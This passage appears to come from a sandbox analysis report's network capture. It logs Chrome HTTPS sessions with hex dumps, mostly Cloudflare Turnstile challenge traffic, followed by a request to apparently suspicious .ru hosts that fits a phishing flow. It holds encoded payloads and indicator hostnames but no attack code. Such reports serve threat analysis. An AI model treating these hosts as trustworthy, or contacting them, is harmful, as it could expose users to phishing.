                                                          2025-01-16 04:17:39 UTC1369INData Raw: 72 41 75 36 6e 63 71 63 6d 76 38 4f 54 4f 35 75 47 76 74 73 33 52 33 65 69 39 74 76 6b 44 41 75 54 61 30 64 58 51 35 65 6a 54 2b 67 6a 73 32 75 67 45 35 4e 77 54 38 78 59 44 47 67 73 4a 43 4f 33 61 48 4e 73 68 41 68 6a 36 33 78 6a 69 4b 53 63 46 47 39 33 2b 48 77 72 70 49 42 72 75 4a 4f 73 53 45 78 67 79 46 51 72 79 4e 7a 63 70 4f 66 30 72 4f 79 31 41 47 6a 49 6a 48 45 4d 2f 47 55 73 74 49 53 4a 51 4a 7a 30 4f 4e 45 49 6d 54 45 34 72 47 45 67 37 4c 78 39 4f 57 47 49 72 55 53 42 56 57 56 42 48 50 44 78 55 54 55 64 75 57 79 31 4d 50 57 64 47 64 58 68 6b 4d 6b 78 6c 62 46 34 77 53 58 46 32 50 30 35 6b 51 46 68 66 65 30 4e 72 69 32 31 72 53 6b 2b 42 69 49 6d 55 67 6d 52 2b 61 49 56 34 56 34 53 50 65 33 2b 57 6c 6f 42 37 6c 5a 53 46 67 48 53 63 5a 58 65 65 6d
                                                          Data Ascii: rAu6ncqcmv8OTO5uGvts3R3ei9tvkDAuTa0dXQ5ejT+gjs2ugE5NwT8xYDGgsJCO3aHNshAhj63xjiKScFG93+HwrpIBruJOsSExgyFQryNzcpOf0rOy1AGjIjHEM/GUstISJQJz0ONEImTE4rGEg7Lx9OWGIrUSBVWVBHPDxUTUduWy1MPWdGdXhkMkxlbF4wSXF2P05kQFhfe0Nri21rSk+BiImUgmR+aIV4V4SPe3+WloB7lZSFgHScZXeem
                                                          2025-01-16 04:17:39 UTC1369INData Raw: 6c 7a 4e 44 6b 76 36 72 49 30 66 76 6d 35 74 59 41 37 38 7a 56 79 77 43 37 32 38 4d 48 34 64 6a 62 35 51 54 70 79 41 44 68 34 4f 45 55 7a 39 44 6e 34 51 7a 6f 32 78 77 59 2b 75 77 4e 36 66 72 65 44 2b 4d 56 4b 42 4d 54 39 53 33 31 2b 41 6e 6d 4b 78 73 44 4d 77 6f 42 43 51 51 4e 4e 41 58 31 2b 2f 63 30 43 51 6b 69 4d 68 49 30 48 53 38 55 4e 79 6f 30 47 7a 6f 34 50 52 34 70 4f 77 30 69 56 43 34 30 45 79 31 50 4e 46 74 59 56 7a 68 66 58 32 41 37 5a 46 39 66 4d 53 46 6a 53 54 77 6e 56 79 78 64 4f 47 77 6f 53 44 42 7a 54 6b 56 49 55 6e 42 57 4e 57 78 4f 54 55 36 41 50 44 31 55 54 6e 68 56 53 49 69 45 5a 31 6c 35 56 6d 65 51 69 34 74 6b 6b 35 43 50 5a 4a 68 78 6d 32 6d 62 6c 33 6d 48 6e 70 74 39 6b 6c 35 74 65 5a 53 70 6c 5a 52 33 64 5a 31 36 6c 33 78 78 71 49
                                                          Data Ascii: lzNDkv6rI0fvm5tYA78zVywC728MH4djb5QTpyADh4OEUz9Dn4Qzo2xwY+uwN6freD+MVKBMT9S31+AnmKxsDMwoBCQQNNAX1+/c0CQkiMhI0HS8UNyo0Gzo4PR4pOw0iVC40Ey1PNFtYVzhfX2A7ZF9fMSFjSTwnVyxdOGwoSDBzTkVIUnBWNWxOTU6APD1UTnhVSIiEZ1l5VmeQi4tkk5CPZJhxm2mbl3mHnpt9kl5teZSplZR3dZ16l3xxqI
                                                          2025-01-16 04:17:39 UTC1369INData Raw: 79 66 72 6d 35 74 65 32 36 76 62 51 76 64 6a 36 31 4c 37 79 35 4e 55 4c 39 75 54 64 44 73 2f 36 2f 42 54 2b 41 2b 38 57 45 77 2f 79 47 78 63 48 39 79 41 4d 49 2f 4d 69 49 50 54 7a 4b 42 54 30 2b 53 72 72 48 2f 37 70 42 53 63 4d 36 67 6b 4a 41 54 59 7a 4c 77 73 37 4a 7a 4d 70 50 7a 73 33 44 6b 49 45 4e 78 56 47 51 7a 63 59 54 43 4a 50 48 55 38 6c 4d 52 30 4c 50 7a 55 68 57 43 31 48 4a 68 59 78 52 79 70 66 49 46 4d 76 47 7a 6c 46 51 47 64 6a 58 31 56 72 61 44 6b 39 63 45 56 66 51 33 4e 76 55 55 68 34 5a 48 74 4b 65 33 64 64 57 48 35 41 62 31 4d 37 57 58 64 58 51 6c 31 33 57 6f 74 68 62 56 71 4f 69 32 31 65 6b 6c 53 4c 67 5a 64 59 65 57 79 61 6c 34 39 70 6e 34 78 74 64 4b 4a 6c 70 33 61 6d 6f 35 74 37 71 32 79 4e 66 57 65 46 6f 33 39 75 69 5a 47 48 62 36 4f
                                                          Data Ascii: yfrm5te26vbQvdj61L7y5NUL9uTdDs/6/BT+A+8WEw/yGxcH9yAMI/MiIPTzKBT0+SrrH/7pBScM6gkJATYzLws7JzMpPzs3DkIENxVGQzcYTCJPHU8lMR0LPzUhWC1HJhYxRypfIFMvGzlFQGdjX1VraDk9cEVfQ3NvUUh4ZHtKe3ddWH5Ab1M7WXdXQl13WothbVqOi21eklSLgZdYeWyal49pn4xtdKJlp3amo5t7q2yNfWeFo39uiZGHb6O


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.449769104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:38 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/902b4be51ba27c69/1737001055937/ICE5gX1v93RNlWk HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:39 UTC200INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:39 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 61
                                                          Connection: close
                                                          Server: cloudflare
                                                          CF-RAY: 902b4c0b28cc4391-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:39 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 16 00 00 00 05 08 02 00 00 00 ce 94 8b 59 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: PNGIHDRYIDAT$IENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.449771104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:39 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/987784403:1736998059:j2mCdESRnQ8yAuLeOGvba0XQvnpuDmbh_9ABveMbcN0/902b4be51ba27c69/vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:39 UTC442INHTTP/1.1 400 Bad Request
                                                          Date: Thu, 16 Jan 2025 04:17:39 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 14
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          cf-chl-out: hxjMVIlqemB/teHlo98yqGNlq/QqoG/kCt8Fg/MIga/kMyC9H1wRjpmdLblr2LEvNr/nL9BgjV7H/CK5E82mug==$PZzFaGaG50Axorp1QgNtnA==
                                                          Server: cloudflare
                                                          CF-RAY: 902b4c100e570f45-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:39 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                          Data Ascii: {"err":100230}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.449772104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:46 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/987784403:1736998059:j2mCdESRnQ8yAuLeOGvba0XQvnpuDmbh_9ABveMbcN0/902b4be51ba27c69/vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 35299
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Content-type: application/x-www-form-urlencoded
                                                          CF-Chl-RetryAttempt: 1
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          CF-Challenge: vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://challenges.cloudflare.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:46 UTC16384OUTData Raw: 76 5f 39 30 32 62 34 62 65 35 31 62 61 32 37 63 36 39 3d 6b 33 6d 6a 37 38 30 35 49 76 33 62 33 62 72 33 30 53 30 76 7a 6f 30 7a 32 65 30 67 62 66 6a 76 24 49 62 51 46 62 64 6a 39 24 33 32 70 62 79 6a 24 73 30 4a 46 62 74 6a 6d 6d 38 58 4e 6d 62 6b 38 62 30 6b 46 6b 62 53 33 62 74 62 38 73 4f 62 4e 6a 43 76 4f 6e 53 77 6f 62 59 62 32 73 38 45 62 32 6a 46 24 62 48 25 32 62 6d 30 2b 62 75 71 53 50 6d 4f 30 6a 32 5a 63 62 51 73 38 51 62 45 7a 55 71 6d 62 5a 4e 33 62 5a 62 24 49 62 79 52 45 2b 6a 6f 62 62 4f 49 62 65 72 6f 62 30 57 5a 77 73 30 69 5a 6f 62 39 50 50 36 6e 77 4d 31 50 6e 30 36 30 30 24 51 7a 57 61 61 5a 65 2d 37 33 67 7a 7a 4f 48 30 43 46 38 6d 70 53 50 71 6a 62 6f 2d 37 5a 30 43 73 32 62 2d 47 5a 53 41 33 46 70 44 44 62 71 54 44 65 68 54 66 56
                                                          Data Ascii: v_902b4be51ba27c69=k3mj7805Iv3b3br30S0vzo0z2e0gbfjv$IbQFbdj9$32pbyj$s0JFbtjmm8XNmbk8b0kFkbS3btb8sObNjCvOnSwobYb2s8Eb2jF$bH%2bm0+buqSPmO0j2ZcbQs8QbEzUqmbZN3bZb$IbyRE+jobbOIberob0WZws0iZob9PP6nwM1Pn0600$QzWaaZe-73gzzOH0CF8mpSPqjbo-7Z0Cs2b-GZSA3FpDDbqTDehTfV
                                                          2025-01-16 04:17:46 UTC16384OUTData Raw: 62 4b 41 69 55 62 4f 32 58 47 41 61 43 53 36 6a 24 4c 69 6e 67 62 62 30 30 4f 62 70 62 38 6a 62 30 62 50 58 32 62 62 63 4a 47 62 32 6f 62 63 62 46 62 45 49 32 7a 62 64 62 62 73 30 70 62 47 62 45 49 30 35 62 78 62 76 4e 38 70 62 31 6a 32 6d 32 65 6d 24 6a 30 49 30 6e 6a 6d 62 77 49 38 65 62 61 6a 65 4f 62 76 62 57 6a 6d 33 32 45 62 7a 62 45 33 62 6a 62 6e 73 45 73 62 4a 62 39 6a 38 62 30 49 7a 73 36 39 49 38 47 62 4f 62 61 70 38 72 30 76 38 62 73 43 76 30 42 62 75 73 43 4a 63 6d 53 30 73 77 36 30 37 62 35 73 77 72 30 37 62 52 37 32 47 73 32 6f 43 33 30 7a 6f 2b 72 45 31 71 46 6a 34 51 62 62 30 58 56 46 61 6d 65 77 4a 52 73 45 7a 32 46 6a 76 62 38 6d 38 46 30 58 6a 51 6d 38 24 30 46 6a 52 6d 77 42 62 66 6a 51 49 53 2b 4f 58 49 76 7a 32 46 6a 62 65 32 49 53
                                                          Data Ascii: bKAiUbO2XGAaCS6j$Lingbb00Obpb8jb0bPX2bbcJGb2obcbFbEI2zbdbbs0pbGbEI05bxbvN8pb1j2m2em$j0I0njmbwI8ebajeObvbWjm32EbzbE3bjbnsEsbJb9j8b0Izs69I8GbObap8r0v8bsCv0BbusCJcmS0sw607b5swr07bR72Gs2oC30zo+rE1qFj4Qbb0XVFamewJRsEz2Fjvb8m8F0XjQm8$0FjRmwBbfjQIS+OXIvz2Fjbe2IS
                                                          2025-01-16 04:17:46 UTC2531OUTData Raw: 32 35 64 6e 36 77 35 30 35 50 4b 62 6b 30 43 32 67 39 2d 56 56 5a 30 62 36 54 75 73 38 66 67 76 36 35 38 68 43 43 58 50 64 44 6a 2b 51 77 6a 45 55 54 76 62 54 36 77 6f 32 6e 4a 59 6a 43 50 57 43 39 4d 68 4a 79 31 52 61 48 6e 4a 7a 72 62 76 62 55 54 66 53 6f 38 46 4f 35 6a 62 6b 73 78 6d 43 33 30 4c 62 52 73 38 6d 38 30 64 52 44 69 4b 7a 31 52 30 2b 73 45 65 79 44 58 6a 76 6a 62 34 55 4d 34 56 2d 50 6a 32 4c 6a 33 6d 66 48 63 47 62 62 34 32 4b 47 74 62 30 47 62 67 30 38 62 39 49 30 32 77 41 49 64 6d 30 37 4d 66 6a 32 4f 38 4e 6a 61 62 32 62 30 34 62 44 62 61 4c 31 33 2d 62 31 56 54 4f 67 32 45 37 56 34 68 6d 30 63 62 53 73 62 24 47 72 33 4f 55 4b 37 30 58 49 65 4c 38 56 62 67 6f 71 4f 38 4a 6a 59 6f 58 69 36 31 62 50 68 4c 55 72 31 62 74 6a 38 6f 30 70 62
                                                          Data Ascii: 25dn6w505PKbk0C2g9-VVZ0b6Tus8fgv658hCCXPdDj+QwjEUTvbT6wo2nJYjCPWC9MhJy1RaHnJzrbvbUTfSo8FO5jbksxmC30LbRs8m80dRDiKz1R0+sEeyDXjvjb4UM4V-Pj2Lj3mfHcGbb42KGtb0Gbg08b9I02wAIdm07Mfj2O8Njab2b04bDbaL13-b1VTOg2E7V4hm0cbSsb$Gr3OUK70XIeL8VbgoqO8JjYoXi61bPhLUr1btj8o0pb
                                                          2025-01-16 04:17:46 UTC1308INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:46 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4624
                                                          Connection: close
                                                          cf-chl-out-s: ILlJTIzoM2nxKRF/lHJuTtM38NMqQ/HKz4HC4qgV/bKv770ghzJj9OnnhlVvArzMcFlbUPS78gIB0UD2JcyUIkjGSAEFfZsXhb0TSBymL4JNwGldZlJ+hVeHPJ3H7OUOP5ASr+lpuxuFIZ8Pr9CVWSmoK/RZWNy2I+gPSTyJUJWhpMJoJL5feJGNfrqsmebOqVUGtSUlNFs3clak5CaTuE0b3VZ/hRs5WamYogUj5SxbyHZRQLPCfBsrxzmRP4iarqz+156bCemoR+RmBiXuRB69eKLmjm0TNEQU1Snqw2rHzPuYXdMtCDQZSWxjrJB4+2zec7R+BSAV+91VqAv3iIl1qSgMlCau2vInd2RhZuDMPLiBQs2Y6xmFcYqzrSd+3uicxziP0gPUCullXBHs+HNnhcopZqLo9d5w8RiaeTgwmu5BWhUd+6SbYJGrJMET6FlR0Y6jeZBrJOJ39356lI8Erfl+3DKFmYueIcQdL7EYFD8F/iZtOyKjuyteg/LWiXF08X7wqKaAgo5xXcnYGs/MXEC2EUFzufm4vfdDGOqTOI7WQAvciscFNMUJsS5GqDa8M4ZBTzTe6kYwmbthqap+xiql3KlKvEdf+DgBTimOSJ5ovXQcxUJsmm8ojPfWWHDbS0ewi2D1ZgwTpURQ56DSJjA35iYn/1uD1tGXVJAP2DRfGurkagpR5Dr4iXjDrfnIT/3tVCS8PWsrSy+EqZD2kNh1avXd+zHXz6FGXzxi1jSthBJQIplAkaTGD0c/ROS56b78weqvGzxazcHFlaq/me/skpzs6TIo80GEF6k2OaHFZMPFLdtVIaJBjFD87u1oL/Sa6OvwlWqX4Mmb8sreYkXJYR7+q73n/3dRrev0sdAqkWgfFmvsZ8PdwNlLGhQ36hudeqUO4TKiM49kKMAYhDWu9EQs+RwAfBvzEbIxdvyj8FrQJ1RPUVoaeWvDLA9zEvoZeN/9GspAXWvDxm6weMXUsi5SDJ5NuoP0e01LwJoYLM [TRUNCATED]
                                                          2025-01-16 04:17:46 UTC229INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 4b 2f 4c 59 57 55 4f 77 34 69 51 54 34 36 54 64 65 74 61 70 41 6c 48 2f 37 33 70 51 75 6e 4a 63 41 46 6b 30 4d 5a 55 7a 2b 65 78 51 30 66 61 36 67 58 30 2f 50 78 71 46 44 35 53 51 4d 33 59 6d 34 5a 39 52 62 77 38 36 41 33 54 41 61 38 38 4d 2f 31 6d 6e 2f 67 42 75 70 32 33 52 6a 77 4f 50 32 49 39 39 2f 31 4f 38 2f 59 73 3d 24 65 69 78 35 33 6d 45 53 68 50 64 64 6f 62 4f 53 47 4c 54 30 6a 67 3d 3d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 32 62 34 63 33 61 35 65 35 34 30 66 34 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                          Data Ascii: cf-chl-out: K/LYWUOw4iQT46TdetapAlH/73pQunJcAFk0MZUz+exQ0fa6gX0/PxqFD5SQM3Ym4Z9Rbw86A3TAa88M/1mn/gBup23RjwOP2I99/1O8/Ys=$eix53mEShPddobOSGLT0jg==Server: cloudflareCF-RAY: 902b4c3a5e540f41-EWRalt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:46 UTC1201INData Raw: 6b 6e 37 48 6c 4a 53 57 70 36 4b 6e 6d 5a 2b 6b 72 62 37 52 69 59 7a 55 7a 61 4f 31 74 61 75 38 75 38 2f 50 32 39 75 79 33 63 47 6a 34 39 2b 6b 74 39 58 6a 76 62 7a 6e 70 75 44 41 38 4f 2f 6f 72 2b 54 7a 37 4c 66 50 2b 4f 53 35 73 2b 2b 32 33 76 69 30 42 63 54 50 32 39 44 64 31 4e 37 44 33 64 76 61 78 74 6f 4d 33 4f 37 30 37 65 34 42 35 78 6e 32 42 4f 34 4d 36 2f 6f 57 48 42 41 4e 4a 42 41 51 42 2b 41 49 49 69 7a 6a 4c 51 44 2b 44 67 34 4c 4a 68 55 54 37 68 55 58 38 42 67 49 2b 54 4d 57 47 77 33 34 4d 69 30 65 2f 42 38 49 4a 69 59 32 47 79 73 72 4a 43 30 4f 52 79 34 76 4a 54 4d 58 4e 43 38 31 57 79 68 4c 4e 30 78 41 4d 32 41 5a 4e 7a 64 57 4a 32 56 64 4f 56 63 6c 51 54 31 4c 4f 6d 4e 6f 63 44 49 30 4e 46 42 50 4f 55 63 35 63 58 5a 65 50 46 5a 79 55 48 57
                                                          Data Ascii: kn7HlJSWp6KnmZ+krb7RiYzUzaO1tau8u8/P29uy3cGj49+kt9XjvbznpuDA8O/or+Tz7LfP+OS5s++23vi0BcTP29Dd1N7D3dvaxtoM3O707e4B5xn2BO4M6/oWHBANJBAQB+AIIizjLQD+Dg4LJhUT7hUX8BgI+TMWGw34Mi0e/B8IJiY2GysrJC0ORy4vJTMXNC81WyhLN0xAM2AZNzdWJ2VdOVclQT1LOmNocDI0NFBPOUc5cXZePFZyUHW
                                                          2025-01-16 04:17:46 UTC1369INData Raw: 52 73 35 52 54 6b 64 43 7a 74 4b 4e 41 67 70 52 42 42 5a 4b 31 49 73 58 54 42 54 51 6b 6f 76 56 46 78 44 57 31 4a 65 58 6b 5a 4d 4a 31 31 68 58 45 31 6d 50 45 31 44 59 53 6c 71 61 31 4e 76 61 48 4d 33 61 47 39 50 4e 48 4a 76 5a 58 70 7a 63 6b 52 31 67 33 56 72 52 31 2b 46 53 6d 75 45 68 6b 2b 4b 67 34 42 72 5a 48 6d 46 66 4a 4a 71 69 70 56 33 63 59 53 61 57 4a 47 54 5a 48 74 71 6c 36 53 71 68 4b 53 50 6e 71 47 63 67 37 61 53 71 4a 69 74 64 36 70 35 73 71 32 32 6f 58 71 41 74 61 50 47 6b 4b 69 43 79 72 6a 41 71 35 79 39 77 4c 4b 4b 69 62 57 50 30 64 6a 4a 71 62 69 35 79 36 75 30 71 38 36 59 73 36 44 57 33 4f 57 6c 79 4b 54 48 70 74 66 4d 76 2b 4c 62 72 73 44 54 34 65 66 48 37 39 6a 77 38 75 66 71 7a 4c 71 31 37 64 4c 43 2b 2f 6e 37 2b 66 62 32 36 64 7a 71
                                                          Data Ascii: Rs5RTkdCztKNAgpRBBZK1IsXTBTQkovVFxDW1JeXkZMJ11hXE1mPE1DYSlqa1NvaHM3aG9PNHJvZXpzckR1g3VrR1+FSmuEhk+Kg4BrZHmFfJJqipV3cYSaWJGTZHtql6SqhKSPnqGcg7aSqJitd6p5sq22oXqAtaPGkKiCyrjAq5y9wLKKibWP0djJqbi5y6u0q86Ys6DW3OWlyKTHptfMv+LbrsDT4efH79jw8ufqzLq17dLC+/n7+fb26dzq
                                                          2025-01-16 04:17:46 UTC1369INData Raw: 31 48 50 6b 4d 58 4d 6a 55 72 51 79 77 57 58 6b 35 65 55 69 4a 59 56 6c 38 38 4d 6b 45 38 4b 55 70 56 51 6d 64 4e 4c 57 34 2b 57 33 42 53 54 7a 42 6c 4e 33 70 4a 53 44 70 56 63 58 57 43 62 6a 31 34 66 47 39 48 50 6f 56 54 53 45 61 4c 5a 33 68 75 58 6e 31 73 64 47 4a 53 64 33 64 31 6b 59 71 51 65 70 6c 37 66 33 36 52 67 34 53 43 68 35 53 49 68 6d 71 61 71 6d 32 63 70 48 70 77 73 47 32 70 5a 35 65 4a 6b 70 43 35 75 58 53 38 6a 35 71 66 6a 34 70 37 6e 5a 4a 39 76 4b 65 6d 75 61 71 71 71 62 79 50 72 71 43 4d 30 4b 79 4d 73 37 6a 4a 73 73 79 6e 6d 61 66 55 74 74 2f 43 73 4d 2f 57 78 63 37 56 34 2b 61 2f 76 74 33 42 70 4c 72 76 33 62 32 2f 39 65 44 33 7a 50 6a 36 37 75 33 7a 36 50 77 41 7a 62 76 4e 36 39 33 53 77 74 62 39 32 76 6e 56 2b 4e 6e 76 79 2f 7a 68 38
                                                          Data Ascii: 1HPkMXMjUrQywWXk5eUiJYVl88MkE8KUpVQmdNLW4+W3BSTzBlN3pJSDpVcXWCbj14fG9HPoVTSEaLZ3huXn1sdGJSd3d1kYqQepl7f36Rg4SCh5SIhmqaqm2cpHpwsG2pZ5eJkpC5uXS8j5qfj4p7nZJ9vKemuaqqqbyPrqCM0KyMs7jJssynmafUtt/CsM/Wxc7V4+a/vt3BpLrv3b2/9eD3zPj67u3z6PwAzbvN693Swtb92vnV+Nnvy/zh8
                                                          2025-01-16 04:17:46 UTC685INData Raw: 52 56 56 46 53 47 6c 70 4a 50 54 51 31 54 30 51 6a 56 46 4e 66 61 53 4e 57 59 56 6b 38 53 31 42 69 55 55 30 77 64 6c 52 6b 61 31 74 51 63 6c 78 70 66 33 55 36 4f 31 52 74 56 6d 52 5a 65 48 39 62 51 34 46 73 59 34 53 46 68 59 4a 66 67 33 4e 4f 53 59 46 34 67 6f 71 51 62 46 70 72 65 5a 57 61 6b 5a 6c 68 68 4a 47 43 69 61 46 71 6f 49 79 45 66 6f 75 43 61 34 4b 50 68 61 71 41 70 49 6d 54 69 35 61 4a 71 61 36 72 75 49 4b 59 73 35 53 59 70 4c 4c 41 71 35 2b 35 68 34 75 75 75 38 57 72 6e 62 2f 48 6a 70 62 42 6c 64 4c 47 76 64 48 53 77 4d 69 79 77 4c 50 4d 78 4e 36 35 33 73 66 4c 36 39 36 6e 72 72 37 49 71 71 72 41 34 2b 66 70 74 4e 48 4b 73 2b 6a 72 33 74 7a 49 38 76 62 35 2b 4e 2f 54 39 63 4c 38 31 66 33 42 2b 67 55 43 32 66 6a 74 41 73 6b 42 7a 39 62 6b 42 64
                                                          Data Ascii: RVVFSGlpJPTQ1T0QjVFNfaSNWYVk8S1BiUU0wdlRka1tQclxpf3U6O1RtVmRZeH9bQ4FsY4SFhYJfg3NOSYF4goqQbFpreZWakZlhhJGCiaFqoIyEfouCa4KPhaqApImTi5aJqa6ruIKYs5SYpLLAq5+5h4uuu8Wrnb/HjpbBldLGvdHSwMiywLPMxN653sfL696nrr7IqqrA4+fptNHKs+jr3tzI8vb5+N/T9cL81f3B+gUC2fjtAskBz9bkBd


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.449773104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:47 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/987784403:1736998059:j2mCdESRnQ8yAuLeOGvba0XQvnpuDmbh_9ABveMbcN0/902b4be51ba27c69/vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:47 UTC442INHTTP/1.1 400 Bad Request
                                                          Date: Thu, 16 Jan 2025 04:17:47 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 14
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          cf-chl-out: qrObB+7KZEZTnE05lO8UFVykSctjXSxvvmYv+5fFxOi6d7XKEcZGwmnUtZzfAX2cjN4Qr98b1+GxxgVeZDsWTQ==$y2YhGGt0fQ5cOJ5Oy81JiA==
                                                          Server: cloudflare
                                                          CF-RAY: 902b4c3f08db7d11-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:47 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                          Data Ascii: {"err":100230}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.449775104.21.42.2084432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:47 UTC680OUTGET /478252250458126598869NAvKmLJHHIDCBIGVWTZZDXTZQNQJWSQOLATPKBEJADGSYPAIIHZIFXUZZGMEARM HTTP/1.1
                                                          Host: dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://guf1.xemirax.ru
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://guf1.xemirax.ru/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:48 UTC897INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          cf-cache-status: DYNAMIC
